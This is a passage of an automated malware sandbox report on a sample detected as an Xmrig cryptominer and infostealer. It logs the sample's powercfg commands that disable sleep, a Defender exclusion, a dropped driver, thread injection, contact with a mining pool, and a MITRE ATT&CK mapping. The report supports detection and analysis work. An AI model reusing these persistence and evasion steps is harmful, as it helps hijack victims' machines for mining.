          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Modifies power options to not sleep / hibernate
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: svchost.exe, 0000003B.00000002.3313207679.00000226EC82F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts31
          Windows Management Instrumentation          		11
          Windows Service          		11
          Windows Service          		1
          Masquerading          		OS Credential Dumping331
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		12
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Service Execution          		1
          DLL Side-Loading          		111
          Process Injection          		1
          Disable or Modify Tools          		LSASS Memory1
          Process Discovery          		Remote Desktop ProtocolData from Removable Media1
          Non-Application Layer Protocol          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading          		141
          Virtualization/Sandbox Evasion          		Security Account Manager141
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive2
          Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
          Process Injection          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information          		LSA Secrets32
          System Information Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          File Deletion          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568489 Sample: lokigod.exe Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 54 windowsupdatebg.s.llnwi.net 2->54 56 pool.hashvault.pro 2->56 60 Malicious sample detected (through community Yara rule) 2->60 62 Multi AV Scanner detection for submitted file 2->62 64 Yara detected Xmrig cryptocurrency miner 2->64 66 6 other signatures 2->66 8 vzppfnnlsyit.exe 1 2->8         started        12 lokigod.exe 1 2 2->12         started        signatures3 process4 file5 50 C:\Windows\Temp\gdtmkvyhysuy.sys, PE32+ 8->50 dropped 68 Multi AV Scanner detection for dropped file 8->68 70 Modifies the context of a thread in another process (thread injection) 8->70 72 Adds a directory exclusion to Windows Defender 8->72 74 Sample is not signed and drops a device driver 8->74 14 svchost.exe 8->14         started        18 powershell.exe 23 8->18         started        20 cmd.exe 1 8->20         started        28 10 other processes 8->28 52 C:\ProgramData\...\vzppfnnlsyit.exe, PE32+ 12->52 dropped 76 Uses powercfg.exe to modify the power settings 12->76 78 Modifies power options to not sleep / hibernate 12->78 22 powershell.exe 23 12->22         started        24 cmd.exe 1 12->24         started        26 powercfg.exe 1 12->26         started        30 12 other processes 12->30 signatures6 process7 dnsIp8 58 pool.hashvault.pro 37.203.243.102, 443, 49704 DAPLDATAPLANETLtdRU Russian Federation 14->58 80 Query firmware table information (likely to detect VMs) 14->80 82 Found strings related to Crypto-Mining 14->82 84 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->84 86 Loading BitLocker PowerShell Module 18->86 32 conhost.exe 18->32         started        44 2 other processes 20->44 34 conhost.exe 22->34         started        36 conhost.exe 24->36         started        38 wusa.exe 24->38         started        40 conhost.exe 26->40         started        46 9 other processes 28->46 42 conhost.exe 30->42         started        48 11 other processes 30->48 signatures9 process10

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          lokigod.exe76%ReversingLabsWin64.Infostealer.Tinba

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe76%ReversingLabsWin64.Infostealer.Tinba
          C:\Windows\Temp\gdtmkvyhysuy.sys5%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          pool.hashvault.pro
          		37.203.243.102
          		truefalse
            		high
            windowsupdatebg.s.llnwi.net
            		178.79.238.0
            		truefalse
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://xmrig.com/docs/algorithmssvchost.exe, 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
                		high

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                37.203.243.102
                		pool.hashvault.proRussian Federation
                		44964DAPLDATAPLANETLtdRUfalse

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1568489
                Start date and time:2024-12-04 17:04:05 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 17s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:62
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:lokigod.exe
                Detection:MAL
                Classification:mal100.spyw.evad.mine.winEXE@88/12@2/1
                EGA Information:
                • Successful, ratio: 25%
                HCA Information:Failed
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                • Excluded IPs from analysis (whitelisted): 4.245.163.56, 40.69.42.241
                • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target lokigod.exe, PID 7320 because it is empty
                • Execution Graph export aborted for target svchost.exe, PID 7636 because there are no executed function
                • Execution Graph export aborted for target vzppfnnlsyit.exe, PID 5268 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtCreateKey calls found.
                • VT rate limit hit for: lokigod.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                11:04:57API Interceptor1x Sleep call for process: lokigod.exe modified
                11:05:01API Interceptor30x Sleep call for process: powershell.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                37.203.243.102xblkpfZ8Y4.exeGet hashmaliciousXmrigBrowse

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  pool.hashvault.proxblkpfZ8Y4.exeGet hashmaliciousXmrigBrowse
                  • 5.188.137.200
                  0kToM9fVGQ.exeGet hashmaliciousXmrigBrowse
                  • 45.76.89.70
                  prog.exeGet hashmaliciousXmrigBrowse
                  • 95.179.241.203
                  bypass.exeGet hashmaliciousXmrigBrowse
                  • 95.179.241.203
                  loader.exeGet hashmaliciousXmrigBrowse
                  • 142.202.242.43
                  7K5DrSyL8Y.exeGet hashmaliciousXmrigBrowse
                  • 45.76.89.70
                  eshkere.batGet hashmaliciousXmrigBrowse
                  • 95.179.241.203
                  frik.exeGet hashmaliciousXmrigBrowse
                  • 95.179.241.203
                  Google Chrome.exeGet hashmaliciousXmrigBrowse
                  • 45.76.89.70
                  e7WMhx18XN.exeGet hashmaliciousSilentXMRMiner, XmrigBrowse
                  • 45.76.89.70
                  windowsupdatebg.s.llnwi.nethttps://bdb142c8309e44b2310105b0e00240d6.surge.sh/Get hashmaliciousUnknownBrowse
                  • 178.79.238.128
                  http://divisioninfo.net/Get hashmaliciousUnknownBrowse
                  • 178.79.238.0
                  001.xlsGet hashmaliciousGet2DownloaderBrowse
                  • 178.79.238.128
                  442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                  • 178.79.238.128
                  Account Review Desk - Help us keep your VAT account accurate.msgGet hashmaliciousCredentialStealerBrowse
                  • 178.79.238.0
                  NF---710.msiGet hashmaliciousAteraAgentBrowse
                  • 178.79.238.128
                  REMITTANCE_PAYMENT54342Saic.htmlGet hashmaliciousPhisherBrowse
                  • 178.79.238.0
                  Compilazione di video e immagini protetti da copyright.batGet hashmaliciousUnknownBrowse
                  • 178.79.238.128
                  http://esaleerugs.comGet hashmaliciousUnknownBrowse
                  • 178.79.238.0
                  KAHILINGAN NG BADYET 25-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.79.238.128

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  DAPLDATAPLANETLtdRUxblkpfZ8Y4.exeGet hashmaliciousXmrigBrowse
                  • 37.203.243.102
                  v859oajfVH.elfGet hashmaliciousUnknownBrowse
                  • 37.203.242.178
                  oAUrOBvfbV.elfGet hashmaliciousMiraiBrowse
                  • 93.188.42.246
                  x86_64-20220704-2102Get hashmaliciousMiraiBrowse
                  • 93.188.42.210
                  9faoC0drSoGet hashmaliciousMiraiBrowse
                  • 93.188.42.249
                  armGet hashmaliciousMiraiBrowse
                  • 93.188.42.224
                  eqqFDsQ1JqGet hashmaliciousMiraiBrowse
                  • 93.188.42.241
                  QeykTlqE4SGet hashmaliciousMiraiBrowse
                  • 93.188.42.232

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Windows\Temp\gdtmkvyhysuy.sysnfkciRoR4j.exeGet hashmaliciousXmrigBrowse
                    File.exeGet hashmaliciousOrcus, XmrigBrowse
                      rLaC8kO1rD.exeGet hashmaliciousXmrigBrowse
                        newtpp.exeGet hashmaliciousXmrigBrowse
                          main.exeGet hashmaliciousBlank Grabber, SilentXMRMiner, XmrigBrowse
                            6xQ8CMUaES.exeGet hashmaliciousXmrigBrowse
                              4o8Tgrb384.exeGet hashmaliciousXmrigBrowse
                                0kToM9fVGQ.exeGet hashmaliciousXmrigBrowse
                                  m2.exeGet hashmaliciousXmrigBrowse
                                    ICBM-noml.exeGet hashmaliciousXmrigBrowse

                                      Created / dropped Files

                                      C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\lokigod.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):5265920
                                      Entropy (8bit):6.532806304390814
                                      Encrypted:false
                                      SSDEEP:98304:CZtFWHS5GGYCdrURVNMjxcJMWQEiNXiRr5k6bbm9dz6O/9Py4TZBZhdy2ZhoS:C0HS8dCjmMWQEBRr5kE4/lPy4zZPyqhT
                                      MD5:769EA3D0E0CF22EAA7526A89C0F438CF
                                      SHA1:5221042AD60744E2BDCF8319FF00BDBFC253EB59
                                      SHA-256:B369C94A835882A2267FF0A7A4EBB9A91621C3F134F63010D491121A7827B448
                                      SHA-512:D50130430911F16F4D2F7E4D3552F51CEB74601EDA13CFBC374C9327E11D7865BDFC49803B54CF7B595B89996DB28D3173D7A22993E968FD9A1A080C6B434C9A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 76%
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...}.Kg.........."...........O.....@..........@..............................P...........`.....................................................<.............P...............P.x...............................(.......8...............x............................text............................... ..`.rdata...=.......>..................@..@.data....O......^O.................@....pdata........P......RP.............@..@.00cfg........P......TP.............@..@.tls..........P......VP.............@....reloc..x.....P......XP.............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1510207563435464
                                      Encrypted:false
                                      SSDEEP:3:Nlllullkv/tz:NllU+v/
                                      MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                      SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                      SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                      SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                      Malicious:false
                                      Preview:@...e................................................@..........

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gqxzagi.ofm.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_crrg4m3j.cop.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_saebe5py.3p3.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xftm0ski.cf3.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1510207563435464
                                      Encrypted:false
                                      SSDEEP:3:NlllulvX/Z:NllUvX
                                      MD5:E55E6E0E1AB6A345A7BCC5FD9C39F70C
                                      SHA1:E5344BE0ED383244752DD96C35183014062EB114
                                      SHA-256:9635856D4CAE632D612BDD5736CEA8F6B6AEEBD6FE3AEB04A842FBDB386BCC91
                                      SHA-512:74908F7F2D21452483A47A25A5728B9211215C6DB2591E94806E477B6B870C92BCE7E11D64A6E9B4AB225927869AD5440ED2995CCA42FD6C8612B027F994A2A5
                                      Malicious:false
                                      Preview:@...e................................................@..........

                                      C:\Windows\Temp\__PSScriptPolicyTest_fd2v2404.w5x.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
